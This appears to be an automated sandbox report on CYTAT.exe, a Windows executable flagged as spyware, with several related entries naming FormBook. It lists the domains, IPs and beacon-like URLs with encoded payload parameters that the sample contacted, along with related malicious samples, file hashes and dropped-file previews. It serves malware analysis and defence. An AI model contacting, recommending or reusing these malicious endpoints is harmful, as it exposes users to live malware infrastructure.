            https://www.elsupertodo.net/2jit/?QF4tL=lBP8AZrpnb&7lpPGx=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQuk100%Avira URL Cloudmalware
            http://www.kexweb.top/3bdq/?7lpPGx=mPDvA1qI3GiuntP+47r7UbinyaAdWbB61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4Exv2wVl5tEpDmVzrjnyzZwQXC/AEB58FOwV7HJGPZNP2SejBf9M+4Q+mbI&QF4tL=lBP8AZrpnb0%Avira URL Cloudsafe
            http://www.tekilla.wtf/fpzw/100%Avira URL Cloudmalware
            https://whois.gandi.net/en/results?search=languagemodel.pro0%Avira URL Cloudsafe
            http://www.dyme.tech/h7lb/?7lpPGx=RbPHaORuq3VLsIvBIelJ5GO51GGMXVitxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0U+kUuYrzibwk/zciraOv0fsIaYVE1FLZq7mKJVkZI1PP5pVux7ZkM0kP&QF4tL=lBP8AZrpnb0%Avira URL Cloudsafe
            http://www.omexai.info/7xi5/100%Avira URL Cloudmalware
            http://www.omexai.info/7xi5/?7lpPGx=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELAxrcBTztpjqBrZhwiA0EH/lToqzuS48eXmZJHBx0mPNMD2Zb1NeSBUqu&QF4tL=lBP8AZrpnb100%Avira URL Cloudmalware
            http://www.bola88site.one/3qit/100%Avira URL Cloudmalware
            http://www.mizuquan.top/e0nr/0%Avira URL Cloudsafe
            http://www.languagemodel.pro/nxfn/?QF4tL=lBP8AZrpnb&7lpPGx=6j3CvtUhPdUgNSN+xHguQlWnRKyrmKs9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVfUOnUHUTgavpIKdyJZhbpRDfHBgtRvaLwhSA3LIOv4/Kx2UtnF+bA/8x0%Avira URL Cloudsafe
            http://www.jobworklanka.online/ikh0/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.elsupertodo.net
            		148.72.152.174
            		truetrue
              		unknown
              webredir.vip.gandi.net
              		217.70.184.50
              		truetrue
                		unknown
                www.kexweb.top
                		63.250.47.40
                		truetrue
                  		unknown
                  bola88site.one
                  		172.96.191.39
                  		truetrue
                    		unknown
                    www.dyme.tech
                    		13.248.169.48
                    		truetrue
                      		unknown
                      www.mizuquan.top
                      		43.242.202.169
                      		truetrue
                        		unknown
                        redirect.3dns.box
                        		172.191.244.62
                        		truetrue
                          		unknown
                          jobworklanka.online
                          		91.184.0.200
                          		truetrue
                            		unknown
                            omexai.info
                            		3.33.130.190
                            		truetrue
                              		unknown
                              www.bola88site.one
                              		unknown
                              		unknowntrue
                                		unknown
                                www.tekilla.wtf
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.omexai.info
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.jobworklanka.online
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.arlon-commerce.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.woshop.online
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.kxshopmr.store
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.languagemodel.pro
                                            		unknown
                                            		unknowntrue
                                              		unknown

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.dyme.tech/h7lb/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.kexweb.top/3bdq/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.tekilla.wtf/fpzw/?QF4tL=lBP8AZrpnb&7lpPGx=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVx67RM9UV6q1id4S41bRGRNPU7sZmTTXii7ECS+ocOWyNUrGm29a8UkIUtrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.languagemodel.pro/nxfn/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.kexweb.top/3bdq/?7lpPGx=mPDvA1qI3GiuntP+47r7UbinyaAdWbB61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4Exv2wVl5tEpDmVzrjnyzZwQXC/AEB58FOwV7HJGPZNP2SejBf9M+4Q+mbI&QF4tL=lBP8AZrpnbtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.jobworklanka.online/ikh0/?QF4tL=lBP8AZrpnb&7lpPGx=lvx8xqKuEeZXr5IXmtDcOSOuXgPzygssZETVjxqXK0Zv2i3/Db6zT6O/acvvHmVSaGyiGmLaE43R+XLSCAO1uJuIaoF4jHIQUSYKPYHcUgvqmMBPmFsZ+bgj1yNrVQypjRbF20O0Zy39true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.tekilla.wtf/fpzw/true
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.omexai.info/7xi5/true
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.dyme.tech/h7lb/?7lpPGx=RbPHaORuq3VLsIvBIelJ5GO51GGMXVitxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0U+kUuYrzibwk/zciraOv0fsIaYVE1FLZq7mKJVkZI1PP5pVux7ZkM0kP&QF4tL=lBP8AZrpnbtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.mizuquan.top/e0nr/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.bola88site.one/3qit/true
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.jobworklanka.online/ikh0/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.languagemodel.pro/nxfn/?QF4tL=lBP8AZrpnb&7lpPGx=6j3CvtUhPdUgNSN+xHguQlWnRKyrmKs9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVfUOnUHUTgavpIKdyJZhbpRDfHBgtRvaLwhSA3LIOv4/Kx2UtnF+bA/8xtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.omexai.info/7xi5/?7lpPGx=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELAxrcBTztpjqBrZhwiA0EH/lToqzuS48eXmZJHBx0mPNMD2Zb1NeSBUqu&QF4tL=lBP8AZrpnbtrue
                                              • Avira URL Cloud: malware
                                              		unknown

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://duckduckgo.com/chrome_newtabnetbtugc.exe, 0000000C.00000003.1808011117.0000000007C0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://duckduckgo.com/ac/?q=netbtugc.exe, 0000000C.00000003.1808011117.0000000007C0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.mizuquan.topeMNaOgRkIZi.exe, 0000000D.00000002.3108584248.0000000004DE1000.00000040.80000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.google.com/images/branding/product/ico/googleg_lodp.iconetbtugc.exe, 0000000C.00000003.1808011117.0000000007C0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.elsupertodo.net/2jit/?QF4tL=lBP8AZrpnb&7lpPGx=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQuknetbtugc.exe, 0000000C.00000002.3107256962.0000000003F18000.00000004.10000000.00040000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000D.00000002.3106679302.0000000003038000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.1913472378.0000000025CF8000.00000004.80000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=netbtugc.exe, 0000000C.00000003.1808011117.0000000007C0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=netbtugc.exe, 0000000C.00000003.1808011117.0000000007C0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://www.gandi.net/en/domainnetbtugc.exe, 0000000C.00000002.3109366430.00000000061C0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000002.3107256962.0000000004560000.00000004.10000000.00040000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000D.00000002.3106679302.0000000003680000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.ecosia.org/newtab/netbtugc.exe, 0000000C.00000003.1808011117.0000000007C0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://whois.gandi.net/en/results?search=languagemodel.pronetbtugc.exe, 0000000C.00000002.3109366430.00000000061C0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000002.3107256962.0000000004560000.00000004.10000000.00040000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000D.00000002.3106679302.0000000003680000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://ac.ecosia.org/autocomplete?q=netbtugc.exe, 0000000C.00000003.1808011117.0000000007C0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnetbtugc.exe, 0000000C.00000003.1808011117.0000000007C0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=netbtugc.exe, 0000000C.00000003.1808011117.0000000007C0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              172.191.244.62
                                              		redirect.3dns.boxUnited States
                                              		7018ATT-INTERNET4UStrue
                                              63.250.47.40
                                              		www.kexweb.topUnited States
                                              		22612NAMECHEAP-NETUStrue
                                              13.248.169.48
                                              		www.dyme.techUnited States
                                              		16509AMAZON-02UStrue
                                              91.184.0.200
                                              		jobworklanka.onlineNetherlands
                                              		197902HOSTNETNLtrue
                                              172.96.191.39
                                              		bola88site.oneCanada
                                              		59253LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSGtrue
                                              217.70.184.50
                                              		webredir.vip.gandi.netFrance
                                              		29169GANDI-ASDomainnameregistrar-httpwwwgandinetFRtrue
                                              148.72.152.174
                                              		www.elsupertodo.netUnited States
                                              		30083AS-30083-GO-DADDY-COM-LLCUStrue
                                              3.33.130.190
                                              		omexai.infoUnited States
                                              		8987AMAZONEXPANSIONGBtrue
                                              43.242.202.169
                                              		www.mizuquan.topHong Kong
                                              		40065CNSERVERSUStrue

                                              General Information

                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1518075
                                              Start date and time:2024-09-25 11:35:14 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 9m 34s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Run name:Run with higher sleep bypass
                                              Number of analysed new started processes analysed:19
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:2
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:CYTAT.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@7/2@12/9
                                              EGA Information:
                                              • Successful, ratio: 75%
                                              HCA Information:
                                              • Successful, ratio: 98%
                                              • Number of executed functions: 53
                                              • Number of non-executed functions: 301
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 92.204.80.11
                                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, whois-unverified.domainbox.akadns.net, ctldl.windowsupdate.com, time.windows.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target eMNaOgRkIZi.exe, PID 2432 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • VT rate limit hit for: CYTAT.exe

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              06:56:29API Interceptor6453983x Sleep call for process: netbtugc.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              172.191.244.62Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                              • www.tekilla.wtf/fpzw/
                                              PO# Q919240.exeGet hashmaliciousFormBookBrowse
                                              • www.tekilla.wtf/fpzw/
                                              PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                              • www.tekilla.wtf/fpzw/
                                              EGCS-875-S5-SMO M2A.exeGet hashmaliciousFormBookBrowse
                                              • www.lurknlarkk.xyz/cjjz/
                                              PO #86637.exeGet hashmaliciousFormBookBrowse
                                              • www.tekilla.wtf/fpzw/
                                              AUG 2024 SOA.exeGet hashmaliciousFormBookBrowse
                                              • www.hermesmilano.xyz/f3mz/
                                              DN.exeGet hashmaliciousFormBookBrowse
                                              • www.hermesmilano.xyz/f3mz/
                                              COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                              • www.tekilla.wtf/fpzw/
                                              GOVT __OF SHARJAH - UNIVERSITY OF SHARJAH - Project 0238.exeGet hashmaliciousFormBookBrowse
                                              • www.hermesmilano.xyz/lmxx/
                                              COTIZACION 280824.exeGet hashmaliciousFormBookBrowse
                                              • www.tekilla.wtf/fpzw/
                                              63.250.47.40Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                              • www.kexweb.top/3bdq/
                                              ES-241-29335_pdf.exeGet hashmaliciousFormBookBrowse
                                              • www.brupack.online/t8b6/
                                              PO# Q919240.exeGet hashmaliciousFormBookBrowse
                                              • www.kexweb.top/3bdq/
                                              PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                              • www.kexweb.top/3bdq/
                                              k8FSEGGo4d9blGr.exeGet hashmaliciousFormBookBrowse
                                              • www.balclub.top/n6ow/
                                              PO #86637.exeGet hashmaliciousFormBookBrowse
                                              • www.kexweb.top/3bdq/
                                              COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                              • www.kexweb.top/3bdq/
                                              ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                              • www.kexweb.top/mfb2/
                                              ORDER_38746_pdf.exeGet hashmaliciousFormBookBrowse
                                              • www.kexweb.top/mfb2/

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              www.dyme.techCotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                              • 13.248.169.48
                                              PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                              • 13.248.169.48
                                              New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                              • 13.248.169.48
                                              New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                              • 13.248.169.48
                                              Scan 00093847.exeGet hashmaliciousFormBookBrowse
                                              • 13.248.169.48
                                              doc330391202408011.exeGet hashmaliciousFormBookBrowse
                                              • 13.248.169.48
                                              PO #86637.exeGet hashmaliciousFormBookBrowse
                                              • 13.248.169.48
                                              REQST_PRC 410240665_2024.exeGet hashmaliciousFormBookBrowse
                                              • 13.248.169.48
                                              REQST_PRC 410240.exeGet hashmaliciousFormBookBrowse
                                              • 13.248.169.48
                                              COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                              • 13.248.169.48
                                              webredir.vip.gandi.netCotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              ES-241-29335_pdf.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              PO# Q919240.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              PO098765678.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              FATURALAR PDF.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              Order#Qxz091124.exeGet hashmaliciousFormBookBrowse
                                              • 217.70.184.50
                                              www.elsupertodo.netCotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                              • 148.72.152.174
                                              PO# Q919240.exeGet hashmaliciousFormBookBrowse
                                              • 148.72.152.174
                                              PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                              • 148.72.152.174
                                              FATURALAR PDF.exeGet hashmaliciousFormBookBrowse
                                              • 148.72.152.174
                                              PO #86637.exeGet hashmaliciousFormBookBrowse
                                              • 148.72.152.174
                                              COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                              • 148.72.152.174
                                              COTIZACION 280824.exeGet hashmaliciousFormBookBrowse
                                              • 148.72.152.174
                                              www.kexweb.topCotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                              • 63.250.47.40
                                              PO# Q919240.exeGet hashmaliciousFormBookBrowse
                                              • 63.250.47.40
                                              PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                              • 63.250.47.40
                                              PO #86637.exeGet hashmaliciousFormBookBrowse
                                              • 63.250.47.40
                                              COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                              • 63.250.47.40
                                              ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                              • 63.250.47.40
                                              ORDER_38746_pdf.exeGet hashmaliciousFormBookBrowse
                                              • 63.250.47.40

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              ATT-INTERNET4USSecuriteInfo.com.Linux.Siggen.9999.1529.24643.elfGet hashmaliciousUnknownBrowse
                                              • 107.130.227.220
                                              https://www.canva.com/design/DAGRqYHU9fM/qLQ4eWyHLFZd4WO6lX1hvg/view?utm_content=DAGRqYHU9fM&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousHTMLPhisherBrowse
                                              • 13.32.27.28
                                              http://pub-606ae465ae6543a4a6f9f5ba82186af6.r2.dev/dd.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • 13.32.27.77
                                              http://pub-732f20a7195c4bc4b1d41a214679e58c.r2.dev/telegram.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • 13.32.27.129
                                              http://pub-647efec841f2469ea102ef18827f7780.r2.dev/secure_response.htmlGet hashmaliciousGreatness Phishing Kit, HTMLPhisherBrowse
                                              • 13.32.27.44
                                              http://www.flow.page/juno-0/Get hashmaliciousUnknownBrowse
                                              • 13.32.27.35
                                              http://pub-afa55f53401b48e6ad155daf536ad34c.r2.dev/utility_base.htmlGet hashmaliciousGreatness Phishing Kit, HTMLPhisherBrowse
                                              • 13.32.27.129
                                              http://pub-4d560104a89740f899e90e13245f1971.r2.dev/secure_response.htmlGet hashmaliciousGreatness Phishing Kit, HTMLPhisherBrowse
                                              • 13.32.27.44
                                              http://pub-853a8c6d224746258050ceb1dd4dc8c3.r2.dev/response_auth.htmlGet hashmaliciousGreatness Phishing Kit, HTMLPhisherBrowse
                                              • 13.32.27.129
                                              http://pub-382f9bec371e490e8d86f2689f3915b0.r2.dev/response_start.htmlGet hashmaliciousUnknownBrowse
                                              • 13.32.27.44
                                              AMAZON-02UShttps://auth.securetnet.com/44850b/fb7c75ee-a59f-4721-a974-2d0b2fad0b9bGet hashmaliciousUnknownBrowse
                                              • 3.64.230.138
                                              SecuriteInfo.com.Linux.Siggen.9999.1529.24643.elfGet hashmaliciousUnknownBrowse
                                              • 52.93.142.158
                                              Meeting-037-911.oneGet hashmaliciousHTMLPhisherBrowse
                                              • 18.245.46.55
                                              UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 54.67.87.110
                                              https://www.canva.com/design/DAGRqYHU9fM/qLQ4eWyHLFZd4WO6lX1hvg/view?utm_content=DAGRqYHU9fM&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousHTMLPhisherBrowse
                                              • 18.244.18.32
                                              RFQ urrgently.exeGet hashmaliciousFormBookBrowse
                                              • 108.128.197.171
                                              https://www.dropbox.com/l/AACCJz_U-ZDLo7IXCzEFAx8aUAOQwxagfyUGet hashmaliciousHTMLPhisherBrowse
                                              • 3.161.82.28
                                              http://pub-578040898e97448fab462cfa3f671292.r2.dev/gytdindex.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • 3.70.101.28
                                              http://pub-28b78cc368104fdfb2ea280368fa70b5.r2.dev/ihil.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • 18.192.231.252
                                              http://juno-online7373h.wixsite.com/my-site/Get hashmaliciousUnknownBrowse
                                              • 54.171.122.26
                                              HOSTNETNLCotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                              • 91.184.0.200
                                              PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                              • 91.184.0.200
                                              FATURALAR PDF.exeGet hashmaliciousFormBookBrowse
                                              • 91.184.0.200
                                              PASU5160894680 DOCS.scr.exeGet hashmaliciousFormBookBrowse
                                              • 91.184.0.200
                                              z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeGet hashmaliciousFormBookBrowse
                                              • 91.184.0.111
                                              firmware.x86_64.elfGet hashmaliciousUnknownBrowse
                                              • 91.184.0.99
                                              PO #86637.exeGet hashmaliciousFormBookBrowse
                                              • 91.184.0.200
                                              DEBIT NOTE July 2024 PART 2.exeGet hashmaliciousFormBookBrowse
                                              • 91.184.0.200
                                              COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                              • 91.184.0.200
                                              ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                              • 91.184.0.200
                                              NAMECHEAP-NETUSUMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 162.213.249.216
                                              QlHhDu2uh1.exeGet hashmaliciousFormBookBrowse
                                              • 162.0.238.43
                                              RFQ urrgently.exeGet hashmaliciousFormBookBrowse
                                              • 162.0.236.169
                                              https://kps.bharmalsystems.net/files/linkedIn/AZ-ULTIMATE-LINKEDIN/index.htmlGet hashmaliciousUnknownBrowse
                                              • 199.192.20.176
                                              https://kps.bharmalsystems.net/files/linkedIn/AZ-ULTIMATE-LINKEDIN/Get hashmaliciousUnknownBrowse
                                              • 199.192.20.176
                                              https://kps.bharmalsystems.net/files/linkedIn/AZ-ULTIMATE-LINKEDINGet hashmaliciousUnknownBrowse
                                              • 199.192.20.176
                                              RFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                              • 199.192.21.169
                                              https://lender-abang.pages.dev/Get hashmaliciousUnknownBrowse
                                              • 162.213.255.57
                                              https://telegram-message-8n5.pages.dev/Get hashmaliciousUnknownBrowse
                                              • 162.213.255.57
                                              https://arabuserseg.net/pp/xzwGet hashmaliciousUnknownBrowse
                                              • 199.188.205.199

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Temp\01194HH4

                                              Download File
                                              Process:C:\Windows\SysWOW64\netbtugc.exe
                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                              Category:modified
                                              Size (bytes):196608
                                              Entropy (8bit):1.1215420383712111
                                              Encrypted:false
                                              SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                              MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                              SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                              SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                              SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Temp\Ramada

                                              Download File
                                              Process:C:\Users\user\Desktop\CYTAT.exe
                                              File Type:data
                                              Category:modified
                                              Size (bytes):286720
                                              Entropy (8bit):7.994326022010796
                                              Encrypted:true
                                              SSDEEP:6144:0k60OS9LoRfeBnpkq60jqYTRwU3irOc3tkLk9Kga/rCTxx:o7S98fypkqp9113iX3Ik9NaTCTxx
                                              MD5:A29D680488904B6E9BBE62B436214F1A
                                              SHA1:9F06D1E3633535C2CF4BA5DFE015D6B79311D935
                                              SHA-256:E4662D5FAF01AE2F0E86BE7DD5250B6919579BB09BF77F6ED7CE62E80F979DBE
                                              SHA-512:B5AE5F82E1061304311D392CA539658B9EA6909D6FCCD71F3F05E41DFE07329633F7EAF219DCF0AD0F97584F74F6ED44CAE76FB40A7A810010A1380332105B1F
                                              Malicious:false
                                              Reputation:low
                                              Preview:x....9X5H...D...s.0Q..d6E...9X5HTW0MNM00OA0R5GPL5MBHF9X5HT.0MNC/.AA.[.f.My.c..P+.8&8W?/ .S./^=Ag2).?7&fP6..... !)U.BL:v5GPL5MB1G0..(3..-)..P(.*...j,R.X...dU/.M..qPW..Y1]z0+.MBHF9X5H..0M.L10....5GPL5MBH.9Z4CU\0M.I00OA0R5GP\!MBHV9X5(PW0M.M0 OA0P5GVL5MBHF9^5HTW0MNMP4OA2R5GPL5OB..9X%HTG0MNM 0OQ0R5GPL%MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X.<1/DMNMT|KA0B5GP.1MBXF9X5HTW0MNM00Oa0RUGPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL5MBHF9X5HTW0MNM00OA0R5GPL

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):7.539006549749381
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:CYTAT.exe
                                              File size:1'357'205 bytes
                                              MD5:a1eecc39c791b5a57c0e914b116a1672
                                              SHA1:c5deba202f4187bcde6d16af9fb74badafe1abe3
                                              SHA256:502812cc0e25d2c5e3053cb724b38407b6ba9e2ef6c0631d89879602365fd2a8
                                              SHA512:9f023cae995268381887a2a7a13b4191c6c7ae641c99ecd8225c7833ba0dccd45d0d34c061a5ffa8b3d84113dff56d60d1867310e4ed9f6fef6e07c24c3c36e1
